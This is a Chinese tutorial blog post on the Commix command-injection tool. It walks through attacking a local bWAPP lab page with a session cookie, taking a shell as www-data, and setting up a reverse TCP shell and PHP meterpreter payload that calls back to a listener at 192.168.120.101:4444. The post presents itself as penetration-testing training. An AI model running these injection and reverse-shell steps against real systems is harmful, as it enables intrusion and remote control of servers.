声明:【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!
一、Commix是什么?
Commix由Python编写的一款工具,它是一个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。在Kali Linux中自带有Commix这款工具。
二、Commix补充介绍。
Commix是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,现在的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了软件的易用性和渗透的成功率,不得不说,它是IT人员的渗透利器!
三、Commix使用参数有哪些?
在Kali Linux中输入commix –h获取帮助信息!
四、Commix如何使用?
其中的特定信息如Cookie,可通过浏览器调试工具或第三方工具获取!
~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"
询问是否想要一个shell 输入Y 的到shell
[?] Do you want a Pseudo-Terminal shell? [Y/n] > y
Pseudo-Terminal (type '?' for available options)
commix(os_shell) >
得到shell
commix(os_shell) > pwd
/owaspbwa/bwapp-git/bWAPP
commix(os_shell) > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
commix(os_shell) > ls -ll
可以进行反弹shell 结合metasploit 进行内网渗透
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.120.101 """(msf机器)
LHOST => 192.168.120.101
commix(reverse_tcp) > set LPORT 4444
LPORT => 4444
---[ Reverse TCP shells ]---
Type '1' to use a netcat reverse TCP shell.
Type '2' for other reverse TCP shells.
commix(reverse_tcp) > 2
---[ Unix-like reverse TCP shells ]---
Type '1' to use a PHP reverse TCP shell.
Type '2' to use a Perl reverse TCP shell.
Type '3' to use a Ruby reverse TCP shell.
Type '4' to use a Python reverse TCP shell.
Type '5' to use a Socat reverse TCP shell.
Type '6' to use a Bash reverse TCP shell.
Type '7' to use a Ncat reverse TCP shell.
---[ Meterpreter reverse TCP shells ]---
Type '8' to use a PHP meterpreter reverse TCP shell.
Type '9' to use a Python meterpreter reverse TCP shell.
Type '10' to use a Windows meterpreter reverse TCP shell.
Type '11' to use the web delivery script.
commix(reverse_tcp_other) > 8
[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]
[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #复制 启动msf
[*] Once the loading is done, press here any key to continue... #按下确定键就可进行在msf接收到反弹的shell
[+] Everything is in place, cross your fingers and wait for a shell!
Commix使用总结如下:
1.浏览器访问http://127.0.0.1 /bWAPP/commandi.php
2.提交数据 通过抓包工具截取 url cookie data数据
3.用commix 工具指定链接并进入后台
commix -- url "http://127.0.0.1 /bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"
亲爱的同学,我们将持续分享Kali与编程技巧,欢迎关注我们哦!